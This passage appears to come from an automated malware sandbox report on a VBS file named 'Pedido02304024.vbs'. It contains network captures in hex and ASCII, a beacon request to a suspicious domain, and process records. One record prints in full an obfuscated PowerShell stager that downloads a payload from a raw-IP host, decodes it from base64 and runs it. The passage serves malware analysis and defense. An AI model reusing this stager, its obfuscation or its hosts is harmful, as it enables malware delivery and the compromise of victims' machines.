                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
                                                                  Apr 24, 2024 06:37:01.908282042 CEST1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                  Apr 24, 2024 06:37:01.908344030 CEST1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                  Apr 24, 2024 06:37:01.908385992 CEST1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                  Apr 24, 2024 06:37:01.908423901 CEST1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                  Apr 24, 2024 06:37:01.908466101 CEST1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                  Apr 24, 2024 06:37:01.908504963 CEST1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                  Apr 24, 2024 06:37:01.908653975 CEST1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                  Apr 24, 2024 06:37:01.908729076 CEST1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
                                                                  Apr 24, 2024 06:37:01.908807993 CEST1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                                                  Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT
                                                                  Apr 24, 2024 06:37:01.908967018 CEST1289INData Raw: 32 48 d6 44 dc e8 79 49 48 a3 f4 4f ab 0f 03 44 24 04 fb 5d b3 56 cc 3b 29 45 bf b0 f3 8d e4 f6 41 b8 f7 99 6c d3 df 81 b5 f0 0e 16 78 fd 50 4f b0 c5 77 88 66 fb 96 fc 24 05 f7 f8 23 8e 1f 4a f1 39 05 6a 0f 1b 87 db dd 95 cf 1b ee 3d 3e ff d4 49
                                                                  Data Ascii: 2HDyIHOD$]V;)EAlxPOwf$#J9j=>I?TW]>qYw5@ X9v{A0hxi>E&IR#QO?Pkx'ds<3*5k&fJ=Q.a8Jv{?0( x


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449745172.67.152.117805164C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:37:03.643573046 CEST534OUTGET /gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8 HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en
                                                                  Connection: close
                                                                  Host: www.theplays.shop
                                                                  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                  Apr 24, 2024 06:37:04.181361914 CEST1289INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 24 Apr 2024 04:37:04 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYZ9TiDcQtzlhfExeY4sq60KwRDjErW4%2FzGWPaU6WoyRekODs52%2FRy77MEWTK71TvrSANNB1XQm008yy7DmXD2ZF6D%2Fr%2BPZpzdiSBQ6feAS1jTbJx920u5YYGyDPH63ELNiS8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8793655a483fdba2-LAX
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09
                                                                  Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}
                                                                  Apr 24, 2024 06:37:04.181390047 CEST411INData Raw: 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69
                                                                  Data Ascii: .desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font
                                                                  Apr 24, 2024 06:37:04.510030031 CEST1289INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                  Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                  Apr 24, 2024 06:37:04.510088921 CEST1289INData Raw: 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35 63 32 49 45 59 30 2b 53 56
                                                                  Data Ascii: /Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr
                                                                  Apr 24, 2024 06:37:04.510258913 CEST1289INData Raw: 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37 37 36 48 78 69 6b 34 44 69
                                                                  Data Ascii: OEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkH
                                                                  Apr 24, 2024 06:37:04.510302067 CEST1289INData Raw: 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c
                                                                  Data Ascii: 0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjw
                                                                  Apr 24, 2024 06:37:04.510446072 CEST1289INData Raw: 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50
                                                                  Data Ascii: Dip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41
                                                                  Apr 24, 2024 06:37:04.510484934 CEST1289INData Raw: 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78 47 59 39 70 32 42 4e 46 66
                                                                  Data Ascii: rS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+PrFkk8CAAqj
                                                                  Apr 24, 2024 06:37:04.510523081 CEST1289INData Raw: 4f 4f 36 4e 64 41 4a 41 59 36 37 54 75 6a 47 45 59 5a 75 37 36 43 4f 7a 42 4c 69 4f 56 52 6f 50 4b 39 53 76 34 65 76 30 35 64 65 47 49 4d 70 75 58 62 37 6b 64 2f 6c 36 64 59 48 2f 39 39 36 71 53 65 2f 2f 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73
                                                                  Data Ascii: OO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i833l9+IDE7bVB+OwZAxfHtG5WucnT+yR3tDide6x2g0fUnIru6Qw/ahrxlbTQY9V8ajH
                                                                  Apr 24, 2024 06:37:04.510618925 CEST1289INData Raw: 59 2b 50 68 74 30 41 55 59 4c 36 54 56 71 57 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f
                                                                  Data Ascii: Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skp
                                                                  Apr 24, 2024 06:37:04.511018038 CEST1289INData Raw: 55 4f 32 31 57 79 7a 58 4e 57 66 48 53 4f 71 34 36 76 53 37 47 6d 34 72 4d 50 43 73 66 31 6d 52 76 69 71 4e 43 30 34 49 73 56 50 79 44 7a 71 51 56 61 47 2b 4e 52 67 31 50 38 64 46 58 67 33 32 54 4d 51 4a 61 6e 69 48 79 6c 72 57 69 45 70 39 54 64
                                                                  Data Ascii: UO21WyzXNWfHSOq46vS7Gm4rMPCsf1mRviqNC04IsVPyDzqQVaG+NRg1P8dFXg32TMQJaniHylrWiEp9TdvP68UjoPu6RJ+ExHefACInrNzeQ6A9a7p6hMAw0YoKJKah4kBBySJyQvMtao0BKAk/m8Tm777sQfuGoz6QZDz/hxKKiaiiyW8dO3Gt5nZi0YMHAl/773guFD7VwIgfMM+jZ1CH4R+BTlBujC2AyhyDdtRXF01ZwuK


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:06:34:57
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"
                                                                  Imagebase:0x7ff753400000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:06:34:59
                                                                  Start date:24/04/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d 